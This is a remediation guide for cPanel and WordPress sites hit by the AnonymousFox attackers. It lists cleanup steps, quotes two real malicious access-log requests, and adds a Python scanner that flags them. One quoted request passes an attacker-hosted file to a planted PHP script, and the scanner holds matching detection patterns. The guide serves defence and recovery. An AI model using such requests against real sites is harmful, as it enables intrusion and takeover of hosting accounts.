How to Recover cPanel after AnonymousFox

If your hosting account is affected by AnonymousFox, don’t blame your web host. You are probably running WordPress, and the attackers gained access through vulnerable scripts.
Here’s what you should do.


Step 1: Backup
  • To prevent data loss, back up the database using phpMyAdmin.
  • Archive the plugins, themes and uploads folders, and place the archives in a safe area.
  • Disable all your sites by moving their files outside the public area. Alternatively, you may rename “public_html” to “public_html_bk”.

Step 2: Investigate
Look for signs of AnonymousFox contamination (email accounts and the .contactemail file).

Step 3: Plugins
If you’re using WordPress, check for recently installed plugins.

Step 4: Database
Check your users table using phpMyAdmin.

Note: if any of these steps look like Japanese, you should probably hire someone to investigate and fix your website.

To address the AnonymousFox hack, perform the following:

  • Reset cPanel password.
  • Remove unauthorized email accounts.
  • Reset the cPanel contact emails in the “Contact Information” section.
  • Make sure the .contactemail file contains the correct address.
  • Fix the entries in the users table: look for AnonymousFox entries and revert them.
  • Perform a thorough malware cleanup for your website: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/


Malicious requests:
167.99.49.25 - - [08/Dec/2021:19:57:48 +0100] "POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/__@v6PnSVM/p2.txt HTTP/1.1" 200
167.99.49.25 - - [08/Dec/2021:19:57:34 +0100] "POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1" 200
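Both requests above hit a PHP file sitting directly in /wp-content/ and carry either "anonymousfox" or a Fox parameter in the query string. The following is an added example, not part of the original guide, that scans access-log lines for those traits; the function names, the reason labels and the benign third sample line are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: client, identd, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Heuristic (assumption): a stock WordPress install has only index.php at this level;
# caching drop-ins also live here but are not normally requested over HTTP.
STRAY_PHP_RE = re.compile(r'^/wp-content/(?!index\.php$)[^/]+\.php$', re.I)

def normalise(line):
    """Undo typographic quotes and dashes that appear when logs are pasted into a blog."""
    return (line.replace('\u201c', '"').replace('\u201d', '"')
                .replace('\u2013', '-').strip())

def suspicious_requests(lines):
    """Return one dict per request that shows any trait of the two requests above."""
    hits = []
    for raw in lines:
        m = LOG_RE.match(normalise(raw))
        if not m:
            continue  # not an access-log line we can parse
        url = urlsplit(m['target'])
        params = parse_qs(url.query, keep_blank_values=True)
        reasons = []
        if STRAY_PHP_RE.match(url.path):
            reasons.append('php-file-in-wp-content-root')
        if 'anonymousfox' in url.query.lower():
            reasons.append('anonymousfox-in-query')
        if 'Fox' in params:
            reasons.append('fox-parameter')
        if reasons:
            hits.append({'ip': m['ip'], 'time': m['ts'], 'method': m['method'],
                         'path': url.path, 'status': int(m['status']),
                         'reasons': reasons})
    return hits

# Constructed sample: the two requests quoted in this article (the first with the
# typographic characters a pasted log often has) plus one invented benign request.
SAMPLE = [
    '167.99.49.25 \u2013 \u2013 [08/Dec/2021:19:57:48 +0100] \u201cPOST /wp-content/xydbtmlykd.php?php=anonymousfox.is/__@v6PnSVM/p2.txt HTTP/1.1\u201d 200',
    '167.99.49.25 - - [08/Dec/2021:19:57:34 +0100] "POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1" 200',
    '203.0.113.7 - - [08/Dec/2021:19:58:01 +0100] "GET /wp-content/themes/example/style.css HTTP/1.1" 200',
]

if __name__ == '__main__':
    for hit in suspicious_requests(SAMPLE):
        print(hit['time'], hit['ip'], hit['method'], hit['path'], ','.join(hit['reasons']))
```

Any path it reports with status 200 points at a file to inspect and remove during the malware cleanup step.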
